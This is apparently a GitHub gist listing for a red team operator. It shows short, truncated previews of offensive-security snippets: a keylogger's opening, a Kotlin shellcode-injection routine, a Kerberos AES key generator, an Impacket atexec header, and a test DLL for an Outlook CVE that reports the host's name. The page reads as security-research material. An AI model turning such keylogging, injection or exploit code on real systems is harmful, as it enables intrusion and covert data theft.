Mariusz Banach mgeeky

💭

Wanna sip a sencha?

🔴 Red Team operator. 👾 Windows malware afficionado. 🛡️ Securing the world by stealing cyber criminals' operation theater

2.9k followers · 117 following

Binary-Offensive.com
Poland
https://binary-offensive.com
@mariuszbit
in/mgeeky

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

mgeeky / almost_pwned.md

Created January 24, 2025 22:42 — forked from zachlatta/almost_pwned.md

g.co, Google's official URL shortcut (update: or Google Workspace's domain verification, see bottom), is compromised. People are actively having their Google accounts stolen.

Someone just tried the most sophisticated phishing attack I've ever seen. I almost fell for it. My mind is a little blown.

Someone named "Chloe" called me from 650-203-0000 with Caller ID saying "Google". She sounded like a real engineer, the connection was super clear, and she had an American accent. Screenshot.
They said that they were from Google Workspace and someone had recently gained access to my account, which they had blocked. They asked me if I had recently logged in from Frankfurt, Germany and I said no.
I asked if they can confirm this is Google calling by emailing me from a Google email and they said sure and sent me this email and told me to look for a case number in it, which I saw in

mgeeky / keylogger.cpp

Created January 16, 2025 17:38 — forked from x86matthew/keylogger.cpp

	#include <stdio.h>
	#include <windows.h>

	#pragma comment(lib, "winmm.lib")

	void Nothing(WORD wKey)
	{
	}

	void PrintKey(WORD wKey)

mgeeky / DynamicLibrary.cpp

Created December 18, 2024 11:17 — forked from Washi1337/DynamicLibrary.cpp

Injecting unconventional entry points in a .NET module. Blog post: https://washi.dev/blog/posts/entry-points/

	#include <cstdio>
	#include <windows.h>

	VOID WINAPI TlsCallback(PVOID DllHandle, DWORD Reason, PVOID Reserved)
	{
	puts("[DynamicLibrary.dll]: TLS Callback");
	}

	#ifdef _WIN64
	#pragma comment (linker, "/INCLUDE:_tls_used")

mgeeky / Get-KerberosAESKey.ps1

Created December 10, 2024 20:25 — forked from Kevin-Robertson/Get-KerberosAESKey.ps1

Generate Kerberos AES keys from a known password

	function Get-KerberosAESKey
	{
	<#
	.SYNOPSIS
	Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The
	results have been verified against the test values in RFC3962, MS-KILE, and my own test lab.

	https://tools.ietf.org/html/rfc3962
	https://msdn.microsoft.com/library/cc233855.aspx

mgeeky / Spamassassin rules description

Created December 5, 2024 19:37 — forked from ychaouche/Spamassassin rules description

Spamassassin rules description

	1 AC_BR_BONANZA Too many newlines in a row... spammy template
	2 ACCESSDB Message would have been caught by accessdb
	3 ACCT_PHISHING_MANY Phishing for account information
	4 AC_DIV_BONANZA Too many divs in a row... spammy template
	5 AC_FROM_MANY_DOTS Multiple periods in From user name
	6 AC_HTML_NONSENSE_TAGS Many consecutive multi-letter HTML tags, likely nonsense/spam
	7 AC_POST_EXTRAS Suspicious URL
	8 AC_SPAMMY_URI_PATTERNS10 link combos match highly spammy template
	9 AC_SPAMMY_URI_PATTERNS11 link combos match highly spammy template
	10 AC_SPAMMY_URI_PATTERNS12 link combos match highly spammy template

mgeeky / main.c

Created December 5, 2024 16:57 — forked from dadevel/main.c

EFS Trigger

	#include <windows.h>

	int main() {
	HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL\|FILE_ATTRIBUTE_ENCRYPTED\|FILE_FLAG_DELETE_ON_CLOSE, NULL);
	if (!file \|\| file == INVALID_HANDLE_VALUE) {
	return GetLastError();
	}
	CloseHandle(file);
	return 0;
	}

mgeeky / EtwStartWebClient.cs

Created December 5, 2024 14:13 — forked from klezVirus/EtwStartWebClient.cs

A PoC in C# to enable WebClient Programmatically

	using System.Runtime.InteropServices;
	using System;

	/*
	* Simple C# PoC to enable WebClient Service Programmatically
	* Based on the C++ version from @tirannido (James Forshaw)
	* Twitter: https://twitter.com/tiraniddo
	* URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
	*
	* Compile with:

mgeeky / Kotlin Shellcode Injection.kt

Created December 4, 2024 14:50 — forked from Jire/Kotlin Shellcode Injection.kt

	fun injectShellcode(vararg shellcode: Int) {
	val length = shellcode.size
	val hProcess = (lms!! as WindowsProcess).handle

	val internalBlock = Kernel32.VirtualAllocEx(hProcess, 0, shellcode.size,
	WinNT.MEM_COMMIT, WinNT.PAGE_EXECUTE_READWRITE)

	val buffer = Memory(shellcode.size.toLong())
	for (i in 0..shellcode.lastIndex) buffer.setByte(i.toLong(), shellcode[i].toByte())

mgeeky / atexec_rpc.py

Created November 29, 2024 23:47 — forked from ThePirateWhoSmellsOfSunflowers/atexec_rpc.py

	#!/usr/bin/env python
	# Impacket - Collection of Python classes for working with network protocols.
	#
	# Copyright Fortra, LLC and its affiliated companies
	#
	# All rights reserved.
	#
	# This software is provided under a slightly modified version
	# of the Apache Software License. See the accompanying LICENSE file
	# for more information.

mgeeky / test_dll.c

Created November 26, 2024 16:23 — forked from Homer28/test_dll.c

DLL code for testing CVE-2024-21378 in MS Outlook

	/**
	* This DLL is designed for use in conjunction with the Ruler tool for
	* security testing related to the CVE-2024-21378 vulnerability,
	* specifically targeting MS Outlook.
	*
	* It can be used with the following command line syntax:
	* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
	* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
	*
	* After being loaded into MS Outlook, it sends the PC's hostname and

Newer Older